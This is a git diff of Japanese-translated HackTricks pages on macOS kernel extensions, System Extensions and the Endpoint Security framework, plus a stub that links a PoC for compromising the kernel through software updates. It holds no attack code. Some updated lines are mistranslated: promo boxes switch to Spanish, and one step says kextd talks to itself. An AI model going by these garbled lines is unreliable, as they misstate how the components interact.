@ -840,9 +873,9 @@ XPCは、macOSとiOSで使用されるカーネルであるXNUのInter-Process C
## MIG - Mach Interface Generator
MIGは、Mach IPCコード作成のプロセスを**簡素化するために作られました**。基本的には、与えられた定義でサーバーとクライアントが通信するために必要なコードを**生成します**。生成されたコードが見苦しい場合でも、開発者はそれをインポートするだけで、以前よりもはるかにシンプルなコードを持つことができます。
MIGは、Mach IPCコードの作成プロセスを**簡素化する**ために作成されました。基本的には、サーバーとクライアントが指定された定義と通信するために必要なコードを**生成**します。生成されたコードが醜い場合でも、開発者はそれをインポートするだけで、彼のコードは以前よりもはるかに簡単になります。
詳細は以下をチェックしてください:
詳細については、以下を参照してください:
{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md" %}
[macos-mig-mach-interface-generator.md](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md)
@ -858,14 +891,14 @@ MIGは、Mach IPCコード作成のプロセスを**簡素化するために作
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローしてください
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください
</details>

63
macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
View file

@ -2,58 +2,61 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? HackTricksであなたの企業を宣伝したいですか? または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか? [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をご覧ください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をチェックしてください。これは、私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です
* [**PEASSとHackTricksの公式スワッグ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) **Discordグループ**または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローしてください。
* [**hacktricks repo**](https://github.com/carlospolop/hacktricks)と[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)にPRを送信して、ハッキングのヒントを共有してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか? または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか? [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をご覧ください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をチェックして、[**NFTs**](https://opensea.io/collection/the-peass-family)の独占コレクションを発見しましょう
* [**PEASSとHackTricksの公式スウォッグ**](https://peass.creator-spring.com)を入手しましょう。
* **[💬 Discord](https://emojipedia.org/speech-balloon/)**グループに参加するか、[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** **🐦**で **[@carlospolopm](https://twitter.com/hacktricks\_live)** をフォローしてください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)**と**[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)** **PRを送信**して、ハッキングのヒントを共有してください。
</details>
## 基本情報
カーネル拡張機能Kextsは、**`.kext`**拡張子を持つ**パッケージ**であり、メインのオペレーティングシステムに追加の機能を提供するために、macOSカーネルスペースに直接ロードされます。
カーネル拡張機能Kextsは、**`.kext`** 拡張子を持つ **パッケージ**であり、**macOSカーネルスペースに直接ロード**され、メインオペレーティングシステムに追加機能を提供します。
### 要件
明らかに、これは非常に強力なため、カーネル拡張機能をロードするのは**複雑**です。カーネル拡張機能をロードするために満たす必要がある**要件**は次のとおりです:
明らかに、これは非常に強力なため、カーネル拡張機能をロードするのは **複雑** です。カーネル拡張機能をロードするために満たす必要がある **要件** は次のとおりです:
* **リカバリモードに入る**とき、カーネル**拡張機能のロードが許可される**必要があります:
* **リカバリモードに入る**とき、カーネル **拡張機能をロードできるように許可**する必要があります:
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
* カーネル拡張機能は、**カーネルコード署名証明書**で**署名**されている必要があります。この証明書は**Apple**によってのみ**付与**されます。Appleは、会社とその必要性を詳細に審査します。
* カーネル拡張機能はまた、**ノータリゼーション**を受ける必要があります。Appleはマルウェアをチェックすることができます。
* その後、**root**ユーザーがカーネル拡張機能を**ロード**でき、パッケージ内のファイルは**root**に所属する必要があります。
* アップロードプロセス中、パッケージは**保護された非ルートの場所**に準備される必要があります:`/Library/StagedExtensions``com.apple.rootless.storage.KernelExtensionManagement`の許可が必要です)。
* 最後に、ロードしようとすると、ユーザーは[**確認リクエストを受け取ります**](https://developer.apple.com/library/archive/technotes/tn2459/\_index.html)。承認された場合、コンピュータを**再起動**してロードする必要があります。
* カーネル拡張機能は **カーネルコード署名証明書で署名されている** 必要があり、これは **Apple** によってのみ **付与** されます。会社とその必要性を詳細に審査します。
* カーネル拡張機能は **ノータライズ** されている必要があり、Appleはマルウェアをチェックできます。
* その後、 **root** ユーザーがカーネル拡張機能を **ロード** でき、パッケージ内のファイルは **rootに属している** 必要があります。
* アップロードプロセス中、パッケージは **保護された非rootの場所** に準備する必要があります:`/Library/StagedExtensions``com.apple.rootless.storage.KernelExtensionManagement`権限が必要)。
* 最後に、ユーザーはそれをロードしようとすると、[**確認リクエストを受け取ります**](https://developer.apple.com/library/archive/technotes/tn2459/\_index.html) 、承認された場合、コンピュータを **再起動** してそれをロードする必要があります。
### ロードプロセス
Catalinaでは、次のようになります:**検証**プロセスは**ユーザーランド**で行われることに注意すると興味深いです。ただし、**`com.apple.private.security.kext-management`**の許可を持つアプリケーションのみがカーネルに拡張機能のロードを要求できます:`kextcache`、`kextload`、`kextutil`、`kextd`、`syspolicyd`
Catalinaでは、次のようになりました: **検証** プロセスが **ユーザーランド** で発生することに注目することが興味深いです。ただし、 **`com.apple.private.security.kext-management`** 権限を持つアプリケーションのみがカーネルに拡張機能のロードを要求できます:`kextcache`、`kextload`、`kextutil`、`kextd`、`syspolicyd`
1. **`kextutil`** CLIは、拡張機能のロードのための**検証**プロセスを**開始**します。
* **Machサービス**を使用して**`kextd`**と通信します。
2. **`kextd`**は、**署名**などのさまざまなチェックを行います。
* **`syspolicyd`**と通信して、拡張機能を**ロード**できるかどうかを**確認**します。
3. **`syspolicyd`**は、拡張機能が以前にロードされていない場合、**ユーザーにプロンプト**を表示します。
* **`syspolicyd`**は結果を**`kextd`**に報告します
4. **`kextd`**は最終的にカーネルに拡張機能を**ロードするよう指示**できます
1. **`kextutil`** cli は、拡張機能のロードの **検証** プロセスを **開始** します
* **`kextd`** は **Machサービス** を使用して送信して **`kextd`** と通信します。
2. **`kextd`** は、 **署名** など、いくつかのことをチェックします
* **`syspolicyd`** に拡張機能を **ロード** できるかどうかを **確認** するように話します。
3. **`syspolicyd`** は、拡張機能が以前にロードされていない場合、 **ユーザーにプロンプト** を表示します。
* **`syspolicyd`** は結果を **`kextd`** に報告します
4. **`kextd`** は最終的にカーネルに拡張機能を **ロードするよう指示** できます
**`kextd`**が利用できない場合、**`kextutil`**は同じチェックを実行できます。
**`kextd`** が利用できない場合、**`kextutil`** は同じチェックを実行できます。
## 参考文献
## 参考
* [https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/](https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/)
* [https://www.youtube.com/watch?v=hGKOskSiaQo](https://www.youtube.com/watch?v=hGKOskSiaQo)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? HackTricksであなたの企業を宣伝したいですか または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか? [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をご覧ください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をチェックしてください。これは、私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です。
* [**PEASSとHackTricksの公式スワッグ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) **Discordグループ**または[**Telegramグ
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか? または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか? [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をご覧ください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をチェックして、[**NFTs**](https://opensea.io/collection/the-peass-family)の独占コレクションを発見しましょう。
* [**PEASSとHackTricksの公式スウォッグ**](https://peass.creator-spring.com)を入手しましょう。
* **[💬 Discord](https://emojipedia.org/speech-balloon/)**グループに参加するか、[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** **🐦**で **[@carlospolopm](https://twitter.com/hacktricks\_live)** をフォローしてください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)**と**[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**に **PRを送信**して、ハッキングのヒントを共有してください。
</details>

30
macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
View file

@ -1,30 +1,30 @@
# macOSカーネルの脆弱性
# macOS カーネルの脆弱性
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** HackTricksであなたの企業を宣伝したいですかまたは、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をご覧ください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をご覧ください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)
* [**PEASSとHackTricksの公式スワッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**Discordグループ**](https://emojipedia.org/speech-balloon/)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローしてください。
* [**hacktricks repo**](https://github.com/carlospolop/hacktricks)と[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)にPRを送信して、ハッキングのヒントを共有してください。
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## [OTAの乗っ取り](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/)
## [OTA の Pwning](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/)
[**このレポート**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/)では、ソフトウェアアップデータを乗っ取ることでカーネルを侵害するためのいくつかの脆弱性が説明されています。\
[**このレポート**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) では、ソフトウェアアップデータを妨害することでカーネルを侵害することを可能にしたいくつかの脆弱性が説明されています。\
[**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722).
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** HackTricksであなたの企業を宣伝したいですかまたは、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をご覧ください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をご覧ください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)
* [**PEASSとHackTricksの公式スワッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**Discordグループ**](https://emojipedia.org/speech-balloon/)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローしてください。
* [**hacktricks repo**](https://github.com/carlospolop/hacktricks)と[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)にPRを送信して、ハッキングのヒントを共有してください。
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

104
macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
View file

@ -1,89 +1,89 @@
# macOS システム拡張
# macOSシステム拡張機能
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を使って、ゼロからヒーローまでAWSハッキングを学ぶ</summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)。
- **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
## システム拡張 / エンドポイントセキュリティフレームワーク
## システム拡張機能 / エンドポイントセキュリティフレームワーク
カーネル拡張とは異なり、**システム拡張はユーザースペースで実行されます**。これにより、拡張の不具合によるシステムクラッシュのリスクが低減されます。
**システム拡張機能**は、**カーネル拡張機能とは異なり、ユーザースペースで実行**されるため、拡張機能の誤作動によるシステムクラッシュのリスクが低減されます。
<figure><img src="../../../.gitbook/assets/image (1) (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (1) (3) (1) (1).png" alt="https://knight.sc/images/system-extension-internals-1.png"><figcaption></figcaption></figure>
システム拡張には3種類あります**DriverKit** 拡張、**ネットワーク** 拡張、および **エンドポイントセキュリティ** 拡張
システム拡張機能には、**DriverKit**拡張機能、**Network**拡張機能、**Endpoint Security**拡張機能の3種類があります
### **DriverKit 拡張**
### **DriverKit拡張機能**
DriverKitは、**ハードウェアサポートを提供する**カーネル拡張の代替品です。これにより、デバイスドライバUSB、シリアル、NIC、HIDドライバなど)がカーネルスペースではなくユーザースペースで実行できます。DriverKitフレームワークには、特定のI/O Kitクラスの**ユーザースペースバージョン**が含まれており、カーネルは通常のI/O Kitイベントをユーザースペースに転送し、これらのドライバーがより安全な環境で実行されるようにします。
DriverKitは、**ハードウェアサポートを提供する**カーネル拡張機能の代替となるものです。これにより、デバイスドライバUSB、シリアル、NIC、HIDドライバなどがカーネルスペースではなくユーザースペースで実行されるようになります。DriverKitフレームワークには、**特定のI/O Kitクラスのユーザースペースバージョン**が含まれており、カーネルは通常のI/O Kitイベントをユーザースペースに転送して、これらのドライバが実行される安全な環境を提供します。
### **ネットワーク拡張**
### **Network拡張機能**
ネットワーク拡張は、ネットワークの動作をカスタマイズする機能を提供します。ネットワーク拡張にはいくつかのタイプがあります:
Network拡張機能は、ネットワーク動作をカスタマイズする機能を提供します。いくつかのタイプのNetwork拡張機能があります:
* **アプリプロキシ**: これは、フロー指向のカスタムVPNプロトコルを実装するVPNクライアントを作成するために使用されます。つまり、個々のパケットではなく接続(またはフロー)に基づいてネットワークトラフィックを処理します。
* **パケットトンネル**: これは、パケット指向のカスタムVPNプロトコルを実装するVPNクライアントを作成するために使用されます。つまり、個々のパケットに基づいてネットワークトラフィックを処理します。
* **フィルタデータ**: これは、ネットワーク「フロー」をフィルタリングするために使用されます。フローレベルでネットワークデータを監視または変更することができます。
* **フィルタパケット**: これは、個々のネットワークパケットをフィルタリングするために使用されます。パケットレベルでネットワークデータを監視または変更することができます。
* **DNSプロキシ**: これは、カスタムDNSプロバイダを作成するために使用されます。DNSリクエストとレスポンスを監視または変更するために使用できます。
- **App Proxy**: これは、接続(またはフロー)に基づいてネットワークトラフィックを処理するカスタムVPNプロトコルを実装するVPNクライアントを作成するために使用されます。
- **Packet Tunnel**: これは、個々のパケットに基づいてネットワークトラフィックを処理するカスタムVPNプロトコルを実装するVPNクライアントを作成するために使用されます。
- **Filter Data**: これは、ネットワークの「フロー」をフィルタリングするために使用されます。フローレベルでネットワークデータを監視または変更できます。
- **Filter Packet**: これは、個々のネットワークパケットをフィルタリングするために使用されます。パケットレベルでネットワークデータを監視または変更できます。
- **DNS Proxy**: これは、カスタムDNSプロバイダを作成するために使用されます。DNSリクエストと応答を監視または変更するために使用できます。
## エンドポイントセキュリティフレームワーク
エンドポイントセキュリティは、macOSでAppleが提供するフレームワークであり、システムセキュリティのためのAPIセットを提供します。これは、**セキュリティベンダーや開発者がシステム活動を監視および制御し、悪意のある活動を特定して防御する製品を構築するために使用されることを意図しています**
エンドポイントセキュリティは、AppleがmacOSで提供するシステムセキュリティ用のAPIセットです。これは、**悪意のある活動を特定し、防御するための製品を構築するためにセキュリティベンダーや開発者が使用することを意図**しています
このフレームワークは、プロセスの実行、ファイルシステムイベント、ネットワークおよびカーネルイベントなど**システム活動を監視および制御するAPIのコレクションを提供します**
このフレームワークは、プロセスの実行、ファイルシステムイベント、ネットワークおよびカーネルイベントなど**システム活動を監視および制御するためのAPIのコレクション**を提供します。
このフレームワークのコアはカーネルに実装されており、**`/System/Library/Extensions/EndpointSecurity.kext`** にあるカーネル拡張KEXTです。このKEXTはいくつかの重要なコンポーネントで構成されています:
このフレームワークの中核は、**カーネルに実装されたカーネル拡張機能KEXT**であり、**`/System/Library/Extensions/EndpointSecurity.kext`**に配置されています。このKEXTは、いくつかの主要なコンポーネントで構成されています:
* **EndpointSecurityDriver**: これはカーネル拡張の「エントリポイント」として機能します。OSとエンドポイントセキュリティフレームワークとの間の主要な相互作用ポイントです。
* **EndpointSecurityEventManager**: このコンポーネントはカーネルフックの実装を担当します。カーネルフックにより、フレームワークはシステムコールを傍受することでシステムイベントを監視できます。
* **EndpointSecurityClientManager**: これはユーザースペースクライアントとの通信を管理し、イベント通知を受け取る必要がある接続されているクライアントを追跡します。
* **EndpointSecurityMessageManager**: これはメッセージとイベント通知をユーザースペースクライアントに送信します。
- **EndpointSecurityDriver**: これは、カーネル拡張機能との主なやり取りポイントとして機能します。OSとEndpoint Securityフレームワークとの主要な相互作用ポイントです。
- **EndpointSecurityEventManager**: このコンポーネントは、カーネルフックを実装する責任があります。カーネルフックにより、フレームワークはシステムコールを傍受してシステムイベントを監視できます。
- **EndpointSecurityClientManager**: これはユーザースペースクライアントとの通信を管理し、接続されているクライアントとイベント通知を受け取る必要があるクライアントを追跡します。
- **EndpointSecurityMessageManager**: これはメッセージとイベント通知をユーザースペースクライアントに送信します。
エンドポイントセキュリティフレームワークが監視できるイベントは以下のカテゴリに分類されます:
Endpoint Securityフレームワークが監視できるイベントは、次のカテゴリに分類されます:
* ファイルイベント
* プロセスイベント
* ソケットイベント
* カーネルイベント(カーネル拡張のロード/アンロードやI/O Kitデバイスのオープンなど
- ファイルイベント
- プロセスイベント
- ソケットイベント
- カーネルイベント(カーネル拡張機能の読み込み/アンロードやI/O Kitデバイスのオープンなど
### エンドポイントセキュリティフレームワークアーキテクチャ
<figure><img src="../../../.gitbook/assets/image (3) (8).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (8).png" alt="https://www.youtube.com/watch?v=jaVkpM1UqOs"><figcaption></figcaption></figure>
エンドポイントセキュリティフレームワークとの**ユーザースペース通信**はIOUserClientクラスを通じて行われます。呼び出し元のタイプに応じて、2つの異なるサブクラスが使用されます:
エンドポイントセキュリティフレームワークとの**ユーザースペース通信**は、IOUserClientクラスを介して行われます。呼び出し元のタイプに応じて、異なるサブクラスが使用されます:
* **EndpointSecurityDriverClient**: これには`com.apple.private.endpoint-security.manager`権限が必要で、これはシステムプロセス`endpointsecurityd`のみが保持しています。
* **EndpointSecurityExternalClient**: これには`com.apple.developer.endpoint-security.client`権限が必要です。これは通常、エンドポイントセキュリティフレームワークと対話する必要があるサードパーティのセキュリティソフトウェアによって使用されます。
- **EndpointSecurityDriverClient**: これには`com.apple.private.endpoint-security.manager`権限が必要で、これはシステムプロセス`endpointsecurityd`のみが保持しています。
- **EndpointSecurityExternalClient**: これには`com.apple.developer.endpoint-security.client`権限が必要です。これは通常、Endpoint Securityフレームワークとやり取りする必要があるサードパーティのセキュリティソフトウェアによって使用されます。
エンドポイントセキュリティ拡張**`libEndpointSecurity.dylib`** は、システム拡張がカーネルと通信するために使用するCライブラリです。このライブラリはI/O Kit`IOKit`)を使用してエンドポイントセキュリティKEXTと通信します。
エンドポイントセキュリティ拡張機能:**`libEndpointSecurity.dylib`**は、システム拡張機能がカーネルと通信するために使用するCライブラリです。このライブラリは、I/O Kit (`IOKit`)を使用してEndpoint Security KEXTと通信します。
**`endpointsecurityd`** は、特にブートプロセスの初期段階でエンドポイントセキュリティシステム拡張の管理と起動に関与する重要なシステムデーモンです。**システム拡張**のみが、その`Info.plist`ファイルに**`NSEndpointSecurityEarlyBoot`** とマークされている場合、この初期ブート処理を受けます。
**`endpointsecurityd`**は、エンドポイントセキュリティシステム拡張機能を管理し起動するために関与する主要なシステムデーモンです。**`Info.plist`**ファイルで**`NSEndpointSecurityEarlyBoot`**とマークされた**システム拡張機能のみ**がこの早期起動処理を受け取ります。
